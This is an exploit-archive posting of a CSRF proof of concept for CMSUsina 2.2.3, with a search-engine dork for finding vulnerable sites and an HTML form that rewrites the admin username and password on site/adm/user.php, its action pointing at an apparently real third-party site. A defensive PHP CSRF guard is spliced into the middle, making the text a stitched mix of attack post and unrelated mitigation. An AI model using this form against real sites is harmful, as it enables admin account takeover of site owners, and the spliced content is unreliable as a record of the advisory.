## https://sploitus.com/exploit?id=PACKETSTORM:173843
====================================================================================================================================  
| # Title : CMSUsina V2.2.3 CSRF Add Admin Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) |  
| # Vendor : http://www.ysy.com.br/ |   
| # Dork : "Desenvolvido por Usina da Criação" |  
====================================================================================================================================  
  
poc :  
  
[+] Dorking in Google or other search engine.  
  
[+] The following HTML code edits the admin.  
  
[+] Go to the line 3.  
  
[+] Set the target site link, save changes and apply.  
  
[+] Affected file: site/adm/user.php  
  
[+] http://127.0.0.1/site/adm/user.php  
  
[+] Save the code as poc.html.  
  
<p>Alterar seus dados de acesso</p>   
<fieldset><legend>ALTERAR DADOS</legend>   
<form name="editsenha" method="post" action="http://rcborgesconstrutoracombr/site/adm/user.php?acao=edit">   
<label><b>Usu&aacute;rio</b></label><br />   
<input type="text" name="login" value="." maxlength="14" size="70" /><br /><br /> <label>  
<b>Confirmar usu&aacute;rio</b></label><br /> <input type="text" name="login2" value="." maxlength="14" size="70" /><br />  
<br /> <label><b>Senha</b></label><br /> <input type="password" name="senha" value="." maxlength="14" size="70" /><br />  
<br /> <label><b>Confirmar senha</b></label><br /> <input type="password" name="senha2" value="." maxlength="14" size="70" /><br />  
<br /> <input type="submit" name="submit" value="Alterar senha" /> </form> </fieldset> <!-- end of content --> </div> </td> </tr>   
</table> </body> </html>   
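
A server-side guard against the forged form above, as an added example that is not CMSUsina's code and not part of the original advisory. It assumes the admin login is a PHP session; the function names and the `csrf_token` field are hypothetical.

```php
<?php
// Added example, not CMSUsina code. Assumes a PHP-session admin login;
// function names and the "csrf_token" field are hypothetical.
declare(strict_types=1);

function csrf_token(): string
{
    // One random token per session, created on first use.
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_field(): string
{
    // Hidden input to emit inside every state-changing admin form.
    return '<input type="hidden" name="csrf_token" value="' . csrf_token() . '" />';
}

function same_origin(array $server): bool
{
    // Origin is sent on cross-site POSTs; fall back to Referer.
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    $host = strtolower((string) parse_url($source, PHP_URL_HOST));
    $port = parse_url($source, PHP_URL_PORT);
    $seen = $port ? "$host:$port" : $host;
    $own  = strtolower($server['HTTP_HOST'] ?? '');
    return $own !== '' && $seen === $own; // missing or foreign header fails
}

function csrf_check(array $server, array $post, array $session): bool
{
    $expected = $session['csrf_token'] ?? '';
    $sent     = $post['csrf_token'] ?? '';
    return ($server['REQUEST_METHOD'] ?? '') === 'POST'
        && same_origin($server)
        && is_string($expected) && $expected !== ''
        && is_string($sent) && hash_equals($expected, $sent);
}

// Wiring for an endpoint shaped like site/adm/user.php?acao=edit:
session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);
session_start();
if (($_GET['acao'] ?? '') === 'edit' && !csrf_check($_SERVER, $_POST, $_SESSION)) {
    http_response_code(403); // forged cross-site submission stops here
    exit('Request rejected');
}
```

A form like the one above carries no token and arrives with a foreign Origin, so the request is rejected before any credential change. The `SameSite=Lax` session cookie adds a second layer, since browsers that honour it do not attach the cookie to a cross-site POST.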
  
Greetings to :=================================================================  
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |  
===============================================================================